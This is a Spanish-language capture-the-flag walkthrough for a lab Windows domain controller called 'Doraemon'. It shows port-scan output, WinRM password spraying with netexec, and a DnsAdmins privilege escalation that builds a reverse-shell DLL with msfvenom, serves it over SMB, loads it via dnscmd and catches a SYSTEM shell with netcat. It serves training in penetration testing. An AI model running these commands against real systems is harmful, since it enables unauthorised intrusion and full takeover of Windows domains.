Doraemon

Hacemos el escaneo inicial:

   8   │ 445/tcp   open  microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: DORAEMON)
   9   │ 464/tcp   open  kpasswd5?
  10   │ 593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
  11   │ 636/tcp   open  tcpwrapped
  12   │ 3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
  13   │ 3269/tcp  open  tcpwrapped
  14   │ 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  15   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  16   │ |_http-title: Not Found
  17   │ 9389/tcp  open  mc-nmf       .NET Message Framing
  18   │ 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  19   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  20   │ |_http-title: Not Found
  21   │ 49664/tcp open  msrpc        Microsoft Windows RPC
  22   │ 49665/tcp open  msrpc        Microsoft Windows RPC
  23   │ 49666/tcp open  msrpc        Microsoft Windows RPC
  24   │ 49667/tcp open  msrpc        Microsoft Windows RPC
  25   │ 49669/tcp open  msrpc        Microsoft Windows RPC
  26   │ 49670/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
  27   │ 49671/tcp open  msrpc        Microsoft Windows RPC
  28   │ 49672/tcp open  msrpc        Microsoft Windows RPC
  29   │ 49675/tcp open  msrpc        Microsoft Windows RPC
  30   │ 49738/tcp open  msrpc        Microsoft Windows RPC
  31   │ MAC Address: 00:0C:29:2E:CE:E8 (VMware)
  32   │ Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
  33   │ 
  34   │ Host script results:
  35   │ |_clock-skew: mean: -7h20m01s, deviation: 34m38s, median: -7h00m01s
  36   │ | smb2-security-mode: 
  37   │ |   3:1:1: 
  38   │ |_    Message signing enabled and required
  39   │ |_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:2e:ce:e8 (VMware)
  40   │ | smb-security-mode: 
  41   │ |   account_used: guest
  42   │ |   authentication_level: user
  43   │ |   challenge_response: supported
  44   │ |_  message_signing: required
  45   │ | smb2-time: 
  46   │ |   date: 2025-02-17T12:49:21
  47   │ |_  start_date: 2025-02-17T12:43:48
  48   │ | smb-os-discovery: 
  49   │ |   OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
  50   │ |   Computer name: WIN-VRU3GG3DPLJ
  51   │ |   NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
  52   │ |   Domain name: DORAEMON.THL
  53   │ |   Forest name: DORAEMON.THL
  54   │ |   FQDN: WIN-VRU3GG3DPLJ.DORAEMON.THL

Miramos los archivos compartidos como en la mayoría y encontramos:

Al entrar a esa carpeta encontramos un archivos la cual la descargamos:

Ahora copiamos todos los posibles usuarios a un archivo;

El puerto 5985 es el puerto predeterminado que utiliza WinRM para comunicarse con un equipo remoto en Windows. WinRM es un servicio que permite la administración remota de Windows.

(El puerto HTTP predeterminado es el TCP 5985, y el puerto HTTPS predeterminado es el TCP 5986.)

  14   │ 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  15   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  16   │ |_http-title: Not Found

Ahora con la lista de usuarios miramos si esos mismos usuarios pueden ser la contraseña de otros:

netexec winrm 192.168.1.44 -u users.txt -p users.txt

Y se encontro una credencial:

WINRM       192.168.1.44   WIN-VRU3GG3DPLJ  [+] DORAEMON.THL\Doraemon:Dorayaki1 (Pwn3d!)

Entramos:

Get-ChildItem -Path C:\Users -Recurse -Force -Include *.txt 2>$null

Esto nos arroja:

Entramos al directorio pero como esta oculto usamos -force:


*Evil-WinRM* PS C:\Users\Doraemon\Links> type 'Carta de amor a Shizuka.txt'
Shizuka te doy la clave de mi corazon: ShizukaTeAmobb12345
*Evil-WinRM* PS C:\Users\Doraemon\Links>

AHORA de igual manera agregamos esa contraseña al archivo para probar de quien es la contraseña:

netexec winrm 192.168.1.44 -u users.txt -p users.txt --continue-on-success

--continue-on-success:

Esta opción le indica a netexec que continúe probando otras credenciales incluso después de encontrar una combinación exitosa. Esto es útil si quieres enumerar todas las credenciales válidas.

Se ecnontro lo siguiente:

WINRM       192.168.1.44 [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345 (Pwn3d!)

Ahora entramos como Suneo:

#HACEMOS EL AUMENTO DE PRIVILEGIOS

net user Suneo

INFO:

DnsAdmin | Pentest Everythingviperone.gitbook.io

Bien para esto primero creamos un ardchivo malicioso con msfvenom (dll):

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.50 LPORT=1988 -f dll -o rs.dll

Con:

❯ impacket-smbserver  lasmar ./

Este comando crea un servidor SMB que:

Comparte el directorio actual (./) en la red.
Expone el recurso compartido con el nombre lasmar .
Permite que otros dispositivos en la red se conecten a este recurso compartido y accedan a los archivos dentro del directorio

BIEN!!

Ahora ejecuatemos el comando en la maquina victima:

dnscmd.exe /config /serverlevelplugindll \\192.168.1.50\lasmar\rs.dll

Y nos tiene que salir:

Ahora en escucha:

nc -nlvp 1988

En la maquina victima ejecutamos el siguiente comando:

sc.exe stop dns
sc.exe start dns

Y tendremos la reverse shell... nt authority\system

PreviousWINDOWS NextChimichurri

Last updated 11 months ago